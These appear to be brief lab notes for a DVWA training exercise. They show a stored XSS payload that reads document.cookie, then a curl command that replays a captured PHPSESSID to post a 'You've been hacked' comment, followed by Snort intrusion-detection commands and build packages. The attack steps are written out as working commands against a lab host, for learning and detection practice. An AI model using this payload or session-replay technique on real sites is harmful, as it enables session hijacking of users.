Attacker Login

Change security to low

Inject Payload
    <script>console.log(document.cookie)</script>

Logout

New user logs in

Go to XSS page

Script is executed, cookie is sent to attacker (copy it manually for now)

Attacker user his machine to add a comment using cookie
    curl -X POST -b "security=low; PHPSESSID=9ecc84081433870a847d9c096762a91f" -d "txtName=WhoAmI&mtxMessage=You%27ve+been+hacked&btnSign=Sign+Guestbook" http://10.30.0.235/dvwa/vulnerabilities/xss_s/

-------------------------------------------------------------------

sudo snort -d -l /var/log/snort/ -h 192.168.1.0/24 -A console -c /etc/snort/snort.conf

-------------------------------------------------------------------

Enable snort interface from UI ()


 sudo apt install -y build-essential cmake git pkg-config libpcap-dev libpcre3-dev zlib1g-dev liblzma-dev openssl libssl-dev bison flex libdumbnet-dev libhwloc-dev luajit libluajit-5.1-dev libunwind-dev